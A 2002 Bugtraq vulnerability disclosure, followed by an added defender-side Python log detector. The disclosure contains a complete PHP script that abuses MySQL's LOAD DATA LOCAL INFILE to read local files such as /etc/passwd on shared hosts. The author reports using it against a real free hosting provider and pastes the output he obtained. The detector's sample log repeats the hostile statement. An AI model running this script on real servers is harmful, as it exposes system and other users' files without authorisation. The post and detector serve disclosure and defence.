File reading vulnerable in PHP and MySQL (Local Exploit)

From: Hai Nam Luke (hainamluke@hotmail.com)
Date: 11/26/02

    Date: 26 Nov 2002 10:57:52 -0000
    From: Hai Nam Luke <hainamluke@hotmail.com>
    To: bugtraq@securityfocus.com
    

    An attacker can use PHP and MySQL to read local files in the following way:

    # Create a database (mySQL) and upload this file to your server
    PHP Code: viewfile.php (programmed by Luke)

    ======================================================
    <?php
    // config this data
    $dbhost = "";
    $dbuser = "";
    $dbpasswd = "";
    $dbname = "";
    $file = "/etc/passwd"; // filename that you want to view

    // shell code
    echo "<pre>";

    mysql_connect ($dbhost, $dbuser, $dbpasswd);
    $sql = array (
       "USE $dbname",

       // throw-away table that receives the whole file in one LONGBLOB column
       'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

       // LOCAL makes the client (the PHP process) open $file and send it to the
       // server; the terminators never occur in the file, so it lands in one row
       "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
       . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
       . "ESCAPED BY '' "
       . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

       "SELECT a FROM $tbl LIMIT 1"
    );

    foreach ($sql as $statement) {
       $query = mysql_query ($statement);

       if ($query == false) die (
          "FAILED: " . $statement . "\n" .
          "REASON: " . mysql_error () . "\n"
       );

       // USE, CREATE and LOAD return TRUE rather than a result set; only the
       // final SELECT yields a row, which holds the file contents
       if (! $r = @mysql_fetch_array ($query, MYSQL_NUM)) continue;

       echo htmlspecialchars($r[0]);
       mysql_free_result ($query);
    }
    echo "</pre>";
    ?>

    ======================================================

    You'll receive the full contents of /etc/passwd.

    This vulnerability is very dangerous because a user can read important
    files on your server. In particular, on any free host, a user can use this
    local exploit to read other users' source code, and users can attack one another.

    Example: I uploaded this file and configured it at http://members.lycos.co.uk/
    and I received their file "/proc/cpuinfo":

    ==============================================================
    processor : 0
    vendor_id : GenuineIntel
    cpu family : 6
    model : 8
    model name : Pentium III (Coppermine)
    stepping : 10
    cpu MHz : 997.531
    cache size : 256 KB
    fdiv_bug : no
    hlt_bug : no
    f00f_bug : no
    coma_bug : no
    fpu : yes
    fpu_exception : yes
    cpuid level : 2
    wp : yes
    flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
    bogomips : 1992.29

    processor : 1
    vendor_id : GenuineIntel
    cpu family : 6
    model : 8
    model name : Pentium III (Coppermine)
    stepping : 10
    cpu MHz : 997.531
    cache size : 256 KB
    fdiv_bug : no
    hlt_bug : no
    f00f_bug : no
    coma_bug : no
    fpu : yes
    fpu_exception : yes
    cpuid level : 2
    wp : yes
    flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
    bogomips : 1992.29
    ==============================================================

    And many other files; please check your server!
    Thanks to dodo. Sorry for my poor English!

    Luke (HVA)
    http://www.hackervn.net
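As an added defender-side example (not part of Luke's post or of any project), the following Python detector scans MySQL general query log lines for the LOAD DATA LOCAL INFILE statement that viewfile.php relies on. It rates a read outside an allow-listed directory as high severity and records whether the same connection first created a temporary table, which is the exact sequence the script above issues. The log lines are constructed, and the allow-listed directory /var/lib/mysql-files is an assumption.

```python
import re

# One MySQL general query log line: "<time>\t<connection id> <command>\t<argument>".
# Tolerates both the old "021126 10:57:52" and the newer ISO-8601 timestamp forms.
LOG_LINE = re.compile(r"^(?P<ts>\S+(?: \S+)?)\s+(?P<cid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

# The statement viewfile.php relies on: the client process (PHP) opens the file and
# streams it to the server, so the server's own file privileges never come into play.
LOCAL_INFILE = re.compile(r"\bLOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?LOCAL\s+INFILE\s+'([^']*)'", re.I)
TEMP_TABLE = re.compile(r"\bCREATE\s+TEMPORARY\s+TABLE\b", re.IGNORECASE)

def detect_local_infile(log_text: str, allowed_dirs: list[str]) -> list[dict[str, str]]:
    """One alert per LOAD DATA LOCAL INFILE in the log: severity "high" when the path is
    outside allowed_dirs, "medium" otherwise; staged == "yes" when the same connection
    created a temporary table first (the exact sequence viewfile.php issues)."""
    alerts: list[dict[str, str]] = []
    staged: set[str] = set()  # connection ids that ran CREATE TEMPORARY TABLE
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m["cmd"] != "Query":
            continue
        cid, stmt = m["cid"], m["arg"]
        if TEMP_TABLE.search(stmt):
            staged.add(cid)
            continue
        hit = LOCAL_INFILE.search(stmt)
        if not hit:
            continue
        path = hit.group(1)
        inside = any(path.startswith(d.rstrip("/") + "/") for d in allowed_dirs)
        alerts.append({"time": m["ts"], "connection": cid, "path": path,
                       "severity": "medium" if inside else "high",
                       "staged": "yes" if cid in staged else "no"})
    return alerts

# Constructed sample: connection 3 mirrors what viewfile.php would log; connection 7 is a
# legitimate bulk import from the directory this example assumes to be allow-listed.
SAMPLE_LOG = (
    "021126 10:57:52\t   3 Query\tUSE dbname\n"
    "021126 10:57:52\t   3 Query\tCREATE TEMPORARY TABLE A1038307072 (a LONGBLOB)\n"
    "021126 10:57:52\t   3 Query\tLOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE "
    "A1038307072 FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' "
    "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'\n"
    "021126 10:57:52\t   3 Query\tSELECT a FROM A1038307072 LIMIT 1\n"
    "2002-11-26T10:58:01.000000Z\t   7 Query\tLOAD DATA LOCAL INFILE "
    "'/var/lib/mysql-files/orders.csv' INTO TABLE orders\n")

if __name__ == "__main__":
    print(detect_local_infile(SAMPLE_LOG, ["/var/lib/mysql-files"]))
```

Detection is the fallback; the server-side fix is local_infile=0 under [mysqld], which makes every LOAD DATA LOCAL statement fail regardless of what the client asks for.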
